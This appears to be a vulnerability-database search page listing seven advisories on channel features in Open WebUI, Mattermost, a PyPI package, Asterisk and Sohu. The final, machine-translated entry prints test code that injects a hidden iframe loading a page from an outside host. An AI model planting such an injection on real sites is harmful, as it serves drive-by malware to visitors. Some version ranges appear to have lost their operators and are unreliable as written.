
7 matches found

RedhatCVE
added 2026/05/18 7:58 p.m. | 10 views

CVE-2026-45385

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members including administrators within the same...

CVSS 4.3 | AI score 5.8 | EPSS 0.00204
Exploits: 1 | References: 1
Veracode
added 2024/08/12 10:24 a.m. | 11 views

Improper Access Control

github.com/mattermost/mattermost-server is vulnerable to Improper Access Control. The vulnerability is caused due to a failure to disallow the modification of local channels by a remote, when shared channels are enabled. This allows a malicious remote user to make an arbitrary local channel...

CVSS 4.3 | AI score 6.7 | EPSS 0.00276
Exploits: 0 | References: 3 | Affected Software: 1
OSV
added 2024/08/01 3:15 p.m. | 9 views

CVE-2024-39832

Mattermost versions 9.9.x = 9.9.0, 9.5.x = 9.5.6, 9.7.x = 9.7.5, 9.8.x = 9.8.1 fail to properly safeguard an error handling which allows a malicious remote to permanently delete local data by abusing dangerous error handling, when share channels were enabled...

CVSS 8.7 | AI score 6.6
Exploits: 0 | References: 1
Cvelist
added 2024/08/01 2:5 p.m. | 26 views

CVE-2024-39832 Permanently local data deletion by malicious remote

Mattermost versions 9.9.x = 9.9.0, 9.5.x = 9.5.6, 9.7.x = 9.7.5, 9.8.x = 9.8.1 fail to properly safeguard an error handling which allows a malicious remote to permanently delete local data by abusing dangerous error handling, when share channels were enabled...

CVSS 6.8 | EPSS 0.0046
Exploits: 0 | References: 1
vulnersOsv
added 2021/03/19 9:29 p.m. | 4 views

feature-toggle-manager (>=0.0.1 <=0.0.2), hazard-feed (>=0.2.0 <=0.2.5) potentially affected by CVE-2020-35681 via channels (>=3.0.0 <=3.0.2)

channels PYPI version =3.0.0, =0.0.1, =0.2.0, =0.2.5 Source cves: CVE-2020-35681 Source advisory: OSV:GHSA-V542-8Q9X-CFFC...

CVSS 7.4 | AI score 7.1 | EPSS 0.02658
Exploits: 1
CNVD
added 2019/11/22 12:0 a.m. | 3 views

Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerabilities

Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk are both products of Sangoma Technologies, a Canadian company. Sangoma Technologies Asterisk is a suite of open source telephone switch PBX system software. Sangoma Technologies Asterisk is an open source telephone exchange...

CVSS 6.5 | AI score 6.7 | EPSS 0.02047
Exploits: 0 | References: 1
myhack58
added 2010/01/30 12:0 a.m. | 13 views

Sohu 2010 show channels exist hung it to the vulnerability 0day-vulnerability warning-the black bar safety net

Together to chat about the show section,not the user input is strict filtering,which leads can be inserted into the malicious code so as to achieve hung it to the object. ! Test code: Copy the code document. write"iframe width='1 0 0 0' height=1 0 0 0' src='http://www.hackqing.cn/mm.htm/iframe";...

AI score 0.5
Exploits: 0